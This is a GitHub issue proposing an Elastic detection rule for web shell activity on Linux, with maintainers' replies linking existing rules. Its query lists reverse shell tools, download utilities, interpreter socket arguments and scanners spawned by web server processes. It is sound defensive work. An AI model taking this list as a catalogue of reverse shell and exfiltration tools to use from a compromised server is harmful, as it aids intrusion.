[New Rule] Name of rule: Web Shell Network Activity Detection

[litemars]

Description

Detects network activity initiated by web server processes that may indicate web shell execution.

Target Ruleset

linux

Target Rule Type

Custom (KQL or Lucene)

Tested ECS Version

9.2.0

Query

process where host.os.type == "linux" and event.type == "start" and

/* Process spawned by web server /
process.parent.name in ("apache", "apache2", "httpd", "nginx", "php-fpm", "php-cgi", "lighttpd") and
(
/ Reverse shell tools */
process.name in ("bash", "sh", "dash", "zsh", "nc", "ncat", "netcat", "socat") or

/* Network utilities */
process.name in ("curl", "wget", "ftp", "tftp", "scp", "sftp", "ssh", "telnet") or

(
process.name in ("python", "python2", "python3", "perl", "ruby", "php") and
(
process.args : ("socket", "connect", "tcp", "http", "urllib") or
process.args : ("-c", "-e")
)
) or

/* Network scanning/enumeration */
process.name in ("nmap", "masscan", "ping", "traceroute", "dig", "nslookup", "host")
) and

/* Exclude legitimate application behaviors /
not process.args : (
"localhost", "127.0.0.1", "::1*",
"/usr/share/", "/usr/lib/"
) and

not process.name in ("curl", "wget") or (
process.name in ("curl", "wget") and
not process.args : ("github.com", "packagist.org", "wordpress.org", "npmjs.com")
)

New fields required in ECS/data sources for this rule?

No response

Related issues or PRs

No response

References

No response

Redacted Example Data

No response

[Aegrah]

Hi @litemars, thanks for the issue. We have several rules that detect child executions from web shells in our protections artifacts repository (endpoint rules / EDR ruleset), for example:

• https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_decode_activity_via_web_server.toml
• https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_file_downloaded_and_piped_to_interpreter_by_web_server.toml
• https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_file_downloaded_from_suspicious_source_by_web_server.toml
• https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_file_downloaded_to_suspicious_location_by_web_server.toml
• https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_potential_web_server_directory_traversal.toml
• https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_reverse_shell_executed_via_web_server.toml
• https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_suspicious_download_and_redirect_by_web_server.toml
• https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_suspicious_file_creation_via_web_server.toml
• https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_unusual_command_executed_by_web_server.toml

Also, I created a few ES|QL ones for web server persistence in detection rules as well:

• https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_web_server_sus_child_spawned.toml
• https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_web_server_sus_command_execution.toml
• https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_web_server_sus_destination_port.toml

Let me know if you see any obvious gaps in this repository for the rule you proposed.

[litemars]

Hi @Aegrah,

Somehow I don't see them listed here: https://github.com/elastic/protections-artifacts/tree/main/behavior/rules/linux
And I don't have access to these links.

Feel free to close the issue if you think it is not relevant.

[Aegrah]

Hi @litemars, my bad, I linked the wrong rules. I now linked the correct ones in the comment above!